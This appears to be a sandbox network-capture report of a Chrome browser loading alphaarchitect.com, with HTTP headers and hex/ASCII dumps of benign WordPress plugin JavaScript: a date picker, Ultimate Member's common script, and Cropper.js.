                                                                                                                                                                                                                                                                        Data Ascii: :[23,59]))?e=this.parse(t,e):!0===e||h.isInteger(e)?e=this.now(t,e,i):l.isPlainObject(e)&&h.isInteger(e.pick)&&(e=this.normalize(t,e.pick,i)),e},i.prototype.validate=function(t,e,i){var r=this,i=(i&&i.interval?i:r.item).interval;return r.disabled(e)&&(e=r
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 6f 29 3f 73 2e 6d 61 74 63 68 28 2f 5e 28 68 7c 68 68 29 24 2f 69 29 3f 28 69 3d 6f 2c 22 68 22 21 3d 73 26 26 22 68 68 22 21 3d 73 7c 7c 28 69 25 3d 31 32 29 29 3a 22 69 22 3d 3d 73 26 26 28 6e 3d 6f 29 3a 73 2e 6d 61 74 63 68 28 2f 5e 61 24 2f 69 29 26 26 6f 2e 6d 61 74 63 68 28 2f 5e 70 2f 69 29 26 26 28 22 68 22 69 6e 20 63 7c 7c 22 68 68 22 69 6e 20 63 29 26 26 28 61 3d 21 30 29 3b 72 65 74 75 72 6e 28 61 3f 69 2b 31 32 3a 69 29 2a 6d 2b 6e 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 6d 61 74 73 3d 7b 68 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 3f 68 2e 64 69 67 69 74 73 28 74 29 3a 65 2e 68 6f 75 72 25 31 32 7c 7c 31 32 7d 2c 68 68 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 3f 32 3a 68 2e
                                                                                                                                                                                                                                                                        Data Ascii: o)?s.match(/^(h|hh)$/i)?(i=o,"h"!=s&&"hh"!=s||(i%=12)):"i"==s&&(n=o):s.match(/^a$/i)&&o.match(/^p/i)&&("h"in c||"hh"in c)&&(a=!0);return(a?i+12:i)*m+n},i.prototype.formats={h:function(t,e){return t?h.digits(t):e.hour%12||12},hh:function(t,e){return t?2:h.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 20 65 3d 74 68 69 73 2e 69 74 65 6d 3b 65 2e 65 6e 61 62 6c 65 3d 74 7c 7c 28 2d 31 3d 3d 65 2e 65 6e 61 62 6c 65 3f 31 3a 2d 31 29 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 61 63 74 69 76 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 72 2e 69 74 65 6d 2e 64 69 73 61 62 6c 65 2e 73 6c 69 63 65 28 30 29 3b 72 65 74 75 72 6e 22 66 6c 69 70 22 3d 3d 65 3f 72 2e 66 6c 69 70 45 6e 61 62 6c 65 28 29 3a 21 31 3d 3d 3d 65 3f 28 72 2e 66 6c 69 70 45 6e 61 62 6c 65 28 31 29 2c 6e 3d 5b 5d 29 3a 21 30 3d 3d 3d 65 3f 28 72 2e 66 6c 69 70 45 6e 61 62 6c 65 28 2d 31 29 2c 6e 3d 5b 5d 29 3a 65 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 2c 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b
                                                                                                                                                                                                                                                                        Data Ascii: e=this.item;e.enable=t||(-1==e.enable?1:-1)},i.prototype.deactivate=function(t,e){var r=this,n=r.item.disable.slice(0);return"flip"==e?r.flipEnable():!1===e?(r.flipEnable(1),n=[]):!0===e?(r.flipEnable(-1),n=[]):e.map(function(t){for(var e,i=0;i<n.length;
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1181INData Raw: 26 26 63 2e 70 69 63 6b 3d 3d 69 2c 6e 3d 6d 26 26 6d 2e 70 69 63 6b 3d 3d 69 2c 61 3d 70 26 26 6f 2e 64 69 73 61 62 6c 65 64 28 74 29 2c 73 3d 68 2e 74 72 69 67 67 65 72 28 6f 2e 66 6f 72 6d 61 74 73 2e 74 6f 53 74 72 69 6e 67 2c 6f 2c 5b 6c 2e 66 6f 72 6d 61 74 2c 74 5d 29 3b 72 65 74 75 72 6e 5b 68 2e 74 72 69 67 67 65 72 28 6f 2e 66 6f 72 6d 61 74 73 2e 74 6f 53 74 72 69 6e 67 2c 6f 2c 5b 68 2e 74 72 69 67 67 65 72 28 6c 2e 66 6f 72 6d 61 74 4c 61 62 65 6c 2c 6f 2c 5b 74 5d 29 7c 7c 6c 2e 66 6f 72 6d 61 74 2c 74 5d 29 2c 28 65 3d 5b 6c 2e 6b 6c 61 73 73 2e 6c 69 73 74 49 74 65 6d 5d 2c 72 26 26 65 2e 70 75 73 68 28 6c 2e 6b 6c 61 73 73 2e 73 65 6c 65 63 74 65 64 29 2c 6e 26 26 65 2e 70 75 73 68 28 6c 2e 6b 6c 61 73 73 2e 68 69 67 68 6c 69 67 68 74 65
                                                                                                                                                                                                                                                                        Data Ascii: &&c.pick==i,n=m&&m.pick==i,a=p&&o.disabled(t),s=h.trigger(o.formats.toString,o,[l.format,t]);return[h.trigger(o.formats.toString,o,[h.trigger(l.formatLabel,o,[t])||l.format,t]),(e=[l.klass.listItem],r&&e.push(l.klass.selected),n&&e.push(l.klass.highlighte
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        55192.168.2.449811141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:51 UTC791OUTGET /wp-content/plugins/ultimate-member/assets/js/common.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:51 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-9ed"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147808
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9e8afcdc439-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC878INData Raw: 39 65 64 0d 0a 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 55 4d 26 26 28 77 69 6e 64 6f 77 2e 55 4d 3d 7b 7d 29 2c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 55 4d 2e 63 6f 6d 6d 6f 6e 26 26 28 55 4d 2e 63 6f 6d 6d 6f 6e 3d 7b 7d 29 2c 55 4d 2e 63 6f 6d 6d 6f 6e 3d 7b 74 69 70 73 79 3a 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 66 6e 2e 74 69 70 73 79 26 26 28 6a 51 75 65 72 79 28 22 2e 75 6d 2d 74 69 70 2d 6e 22 29 2e 74 69 70 73 79 28 7b 67 72 61 76 69 74 79 3a 22 6e 22 2c 6f 70 61 63 69 74 79 3a 31 2c 6c 69 76 65 3a 22 61 2e 6c 69 76 65 22 2c 6f 66 66 73 65 74 3a 33 7d 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 74 69 70 2d 77 22 29
                                                                                                                                                                                                                                                                        Data Ascii: 9ed"object"!=typeof window.UM&&(window.UM={}),"object"!=typeof UM.common&&(UM.common={}),UM.common={tipsy:{init:function(){"function"==typeof jQuery.fn.tipsy&&(jQuery(".um-tip-n").tipsy({gravity:"n",opacity:1,live:"a.live",offset:3}),jQuery(".um-tip-w")
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 6c 65 6d 2e 61 74 74 72 28 22 64 61 74 61 2d 64 69 73 61 62 6c 65 64 5f 77 65 65 6b 64 61 79 73 22 29 26 26 4a 53 4f 4e 2e 70 61 72 73 65 28 65 6c 65 6d 2e 61 74 74 72 28 22 64 61 74 61 2d 64 69 73 61 62 6c 65 64 5f 77 65 65 6b 64 61 79 73 22 29 29 3b 76 61 72 20 65 2c 74 3d 6e 75 6c 6c 2c 69 3d 28 76 6f 69 64 20 30 21 3d 3d 65 6c 65 6d 2e 61 74 74 72 28 22 64 61 74 61 2d 79 65 61 72 73 22 29 26 26 28 74 3d 65 6c 65 6d 2e 61 74 74 72 28 22 64 61 74 61 2d 79 65 61 72 73 22 29 29 2c 65 6c 65 6d 2e 61 74 74 72 28 22 64 61 74 61 2d 64 61 74 65 5f 6d 69 6e 22 29 29 2c 61 3d 65 6c 65 6d 2e 61 74 74 72 28 22 64 61 74 61 2d 64 61 74 65 5f 6d 61 78 22 29 2c 6e 3d 5b 5d 2c 6f 3d 5b 5d 2c 69 3d 28 76 6f 69 64 20 30 21 3d 3d 69 26 26 28 6e 3d 69 2e 73 70 6c 69 74 28
                                                                                                                                                                                                                                                                        Data Ascii: lem.attr("data-disabled_weekdays")&&JSON.parse(elem.attr("data-disabled_weekdays"));var e,t=null,i=(void 0!==elem.attr("data-years")&&(t=elem.attr("data-years")),elem.attr("data-date_min")),a=elem.attr("data-date_max"),n=[],o=[],i=(void 0!==i&&(n=i.split(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC301INData Raw: 3f 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 5b 74 5d 29 7c 7c 28 61 5b 74 5d 3d 5b 61 5b 74 5d 5d 29 2c 61 5b 74 5d 2e 70 75 73 68 28 69 29 29 3a 61 5b 74 5d 3d 69 3b 72 65 74 75 72 6e 20 61 7d 7d 7d 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 61 6a 61 78 53 74 61 72 74 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 55 4d 2e 63 6f 6d 6d 6f 6e 2e 74 69 70 73 79 2e 68 69 64 65 28 29 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 61 6a 61 78 53 75 63 63 65 73 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 55 4d 2e 63 6f 6d 6d 6f 6e 2e 74 69 70 73 79 2e 69 6e 69 74 28 29 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 55 4d 2e 63 6f 6d 6d 6f 6e 2e 74 69 70
                                                                                                                                                                                                                                                                        Data Ascii: ?(Array.isArray(a[t])||(a[t]=[a[t]]),a[t].push(i)):a[t]=i;return a}}},jQuery(document).on("ajaxStart",function(){UM.common.tipsy.hide()}),jQuery(document).on("ajaxSuccess",function(){UM.common.tipsy.init()}),jQuery(document).ready(function(){UM.common.tip
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        56192.168.2.449812141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:51 UTC802OUTGET /wp-content/plugins/ultimate-member/assets/libs/cropper/cropper.min.js?ver=1.6.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:51 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-9204"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147808
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9e8be0b72bc-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC877INData Raw: 37 64 63 35 0d 0a 2f 2a 21 0a 20 2a 20 43 72 6f 70 70 65 72 2e 6a 73 20 76 31 2e 36 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 66 65 6e 67 79 75 61 6e 63 68 65 6e 2e 67 69 74 68 75 62 2e 69 6f 2f 63 72 6f 70 70 65 72 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 35 2d 70 72 65 73 65 6e 74 20 43 68 65 6e 20 46 65 6e 67 79 75 61 6e 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 32 33 2d 30 39 2d 31 37 54 30 33 3a 34 34 3a 31 39 2e 38 36 30 5a 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d
                                                                                                                                                                                                                                                                        Data Ascii: 7dc5/*! * Cropper.js v1.6.1 * https://fengyuanchen.github.io/cropperjs * * Copyright 2015-present Chen Fengyuan * Released under the MIT license * * Date: 2023-09-17T03:44:19.860Z */!function(t,e){"object"==typeof exports&&"undefined"!=typeof m
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 69 7d 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 61 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 6e 29 29 3a 43 28 4f 62 6a 65 63 74 28 6e 29 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 74 29 29 7d 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 44 28 74 29 7b 72 65 74 75 72 6e 28 44 3d 22 66 75 6e 63 74 69 6f 6e 22 3d
                                                                                                                                                                                                                                                                        Data Ascii: le:!0}):e[t]=i}):Object.getOwnPropertyDescriptors?Object.defineProperties(a,Object.getOwnPropertyDescriptors(n)):C(Object(n)).forEach(function(t){Object.defineProperty(a,t,Object.getOwnPropertyDescriptor(n,t))})}return a}function D(t){return(D="function"=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 50 28 74 29 7b 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 6e 75 6c 6c 3d 3d 3d 74 29 72 65 74 75 72 6e 20 74 3b 76 61 72 20 69 3d 74 5b 53 79 6d 62 6f 6c 2e 74 6f 50 72 69 6d 69 74 69 76 65 5d 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 69 29 72 65 74 75 72 6e 28 22 73 74 72 69 6e 67 22 3d 3d 3d 65 3f 53 74 72 69 6e 67 3a 4e 75 6d 62 65 72 29 28 74 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 28 69 3d 69 2e 63 61 6c 6c 28 74 2c 65 7c 7c 22 64 65 66 61 75 6c 74 22 29 29 29 72 65 74 75 72 6e 20 69 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 40 40 74 6f 50 72 69 6d 69 74 69 76 65 20 6d 75 73 74 20 72 65 74 75 72 6e 20 61 20 70 72 69 6d 69 74 69 76 65
                                                                                                                                                                                                                                                                        Data Ascii: P(t){t=function(t,e){if("object"!=typeof t||null===t)return t;var i=t[Symbol.toPrimitive];if(void 0===i)return("string"===e?String:Number)(t);if("object"!=typeof(i=i.call(t,e||"default")))return i;throw new TypeError("@@toPrimitive must return a primitive
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 63 65 6e 74 65 72 3a 21 30 2c 68 69 67 68 6c 69 67 68 74 3a 21 30 2c 62 61 63 6b 67 72 6f 75 6e 64 3a 21 30 2c 61 75 74 6f 43 72 6f 70 3a 21 30 2c 61 75 74 6f 43 72 6f 70 41 72 65 61 3a 2e 38 2c 6d 6f 76 61 62 6c 65 3a 21 30 2c 72 6f 74 61 74 61 62 6c 65 3a 21 30 2c 73 63 61 6c 61 62 6c 65 3a 21 30 2c 7a 6f 6f 6d 61 62 6c 65 3a 21 30 2c 7a 6f 6f 6d 4f 6e 54 6f 75 63 68 3a 21 30 2c 7a 6f 6f 6d 4f 6e 57 68 65 65 6c 3a 21 30 2c 77 68 65 65 6c 5a 6f 6f 6d 52 61 74 69 6f 3a 2e 31 2c 63 72 6f 70 42 6f 78 4d 6f 76 61 62 6c 65 3a 21 30 2c 63 72 6f 70 42 6f 78 52 65 73 69 7a 61 62 6c 65 3a 21 30 2c 74 6f 67 67 6c 65 44 72 61 67 4d 6f 64 65 4f 6e 44 62 6c 63 6c 69 63 6b 3a 21 30 2c 6d 69 6e 43 61 6e 76 61 73 57 69 64 74 68 3a 30 2c 6d 69 6e 43 61 6e 76 61 73 48 65
                                                                                                                                                                                                                                                                        Data Ascii: center:!0,highlight:!0,background:!0,autoCrop:!0,autoCropArea:.8,movable:!0,rotatable:!0,scalable:!0,zoomable:!0,zoomOnTouch:!0,zoomOnWheel:!0,wheelZoomRatio:.1,cropBoxMovable:!0,cropBoxResizable:!0,toggleDragModeOnDblclick:!0,minCanvasWidth:0,minCanvasHe
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 31 65 31 31 3b 72 65 74 75 72 6e 20 78 74 2e 74 65 73 74 28 74 29 3f 4d 61 74 68 2e 72 6f 75 6e 64 28 74 2a 65 29 2f 65 3a 74 7d 76 61 72 20 4d 74 3d 2f 5e 77 69 64 74 68 7c 68 65 69 67 68 74 7c 6c 65 66 74 7c 74 6f 70 7c 6d 61 72 67 69 6e 4c 65 66 74 7c 6d 61 72 67 69 6e 54 6f 70 24 2f 3b 66 75 6e 63 74 69 6f 6e 20 66 28 74 2c 65 29 7b 76 61 72 20 69 3d 74 2e 73 74 79 6c 65 3b 7a 28 65 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 4d 74 2e 74 65 73 74 28 65 29 26 26 70 28 74 29 26 26 28 74 3d 22 22 2e 63 6f 6e 63 61 74 28 74 2c 22 70 78 22 29 29 2c 69 5b 65 5d 3d 74 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 2c 65 29 7b 76 61 72 20 69 3b 65 26 26 28 70 28 74 2e 6c 65 6e 67 74 68 29 3f 7a 28 74 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 28 74 2c 65 29 7d
                                                                                                                                                                                                                                                                        Data Ascii: 1e11;return xt.test(t)?Math.round(t*e)/e:t}var Mt=/^width|height|left|top|marginLeft|marginTop$/;function f(t,e){var i=t.style;z(e,function(t,e){Mt.test(e)&&p(t)&&(t="".concat(t,"px")),i[e]=t})}function v(t,e){var i;e&&(p(t.length)?z(t,function(t){v(t,e)}
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 6e 65 72 73 2c 69 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 6e 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 6f 2c 74 2c 68 2c 65 29 7b 76 61 72 20 72 3d 33 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 65 3f 65 3a 7b 7d 2c 73 3d 68 3b 74 2e 74 72 69 6d 28 29 2e 73 70 6c 69 74 28 54 74 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 74 2c 6e 3b 72 2e 6f 6e 63 65 26 26 21 45 74 26 26 28 74 3d 6f 2e 6c 69 73 74 65 6e 65 72 73 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6e 5b 61 5d 5b 68 5d 2c 6f 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 61 2c 73 2c 72 29 3b 66 6f 72 28 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c
                                                                                                                                                                                                                                                                        Data Ascii: ners,i.removeEventListener(t,o,n)})}function b(o,t,h,e){var r=3<arguments.length&&void 0!==e?e:{},s=h;t.trim().split(Tt).forEach(function(a){var t,n;r.once&&!Et&&(t=o.listeners,s=function(){delete n[a][h],o.removeEventListener(a,s,r);for(var t=arguments.l
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 61 74 28 69 2c 22 29 22 29 29 2c 70 28 61 29 26 26 31 21 3d 3d 61 26 26 6f 2e 70 75 73 68 28 22 73 63 61 6c 65 59 28 22 2e 63 6f 6e 63 61 74 28 61 2c 22 29 22 29 29 2c 6f 2e 6c 65 6e 67 74 68 3f 6f 2e 6a 6f 69 6e 28 22 20 22 29 3a 22 6e 6f 6e 65 22 29 3b 72 65 74 75 72 6e 7b 57 65 62 6b 69 74 54 72 61 6e 73 66 6f 72 6d 3a 6e 2c 6d 73 54 72 61 6e 73 66 6f 72 6d 3a 6e 2c 74 72 61 6e 73 66 6f 72 6d 3a 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 74 2c 65 29 7b 76 61 72 20 69 3d 74 2e 70 61 67 65 58 2c 74 3d 74 2e 70 61 67 65 59 2c 61 3d 7b 65 6e 64 58 3a 69 2c 65 6e 64 59 3a 74 7d 3b 72 65 74 75 72 6e 20 65 3f 61 3a 53 28 7b 73 74 61 72 74 58 3a 69 2c 73 74 61 72 74 59 3a 74 7d 2c 61 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 74 2c 65 29 7b 76 61 72 20 69 2c 61 3d
                                                                                                                                                                                                                                                                        Data Ascii: at(i,")")),p(a)&&1!==a&&o.push("scaleY(".concat(a,")")),o.length?o.join(" "):"none");return{WebkitTransform:n,msTransform:n,transform:n}}function M(t,e){var i=t.pageX,t=t.pageY,a={endX:i,endY:t};return e?a:S({startX:i,startY:t},a)}function R(t,e){var i,a=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 2c 4c 29 2c 58 28 74 2c 4c 29 2c 7b 77 69 64 74 68 3a 4d 61 74 68 2e 6d 61 78 28 69 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 30 3c 3d 6e 3f 6e 3a 32 30 30 29 2c 68 65 69 67 68 74 3a 4d 61 74 68 2e 6d 61 78 28 69 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 30 3c 3d 65 3f 65 3a 31 30 30 29 7d 29 3b 66 28 61 2c 7b 77 69 64 74 68 3a 28 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 44 61 74 61 3d 6e 29 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 6e 2e 68 65 69 67 68 74 7d 29 2c 76 28 74 2c 4c 29 2c 58 28 61 2c 4c 29 7d 2c 69 6e 69 74 43 61 6e 76 61 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 44 61 74 61 2c 65 3d 74 68 69 73 2e 69 6d 61 67 65 44 61 74 61 2c 69 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 76 69 65 77 4d
                                                                                                                                                                                                                                                                        Data Ascii: ,L),X(t,L),{width:Math.max(i.offsetWidth,0<=n?n:200),height:Math.max(i.offsetHeight,0<=e?e:100)});f(a,{width:(this.containerData=n).width,height:n.height}),v(t,L),X(a,L)},initCanvas:function(){var t=this.containerData,e=this.imageData,i=this.options.viewM
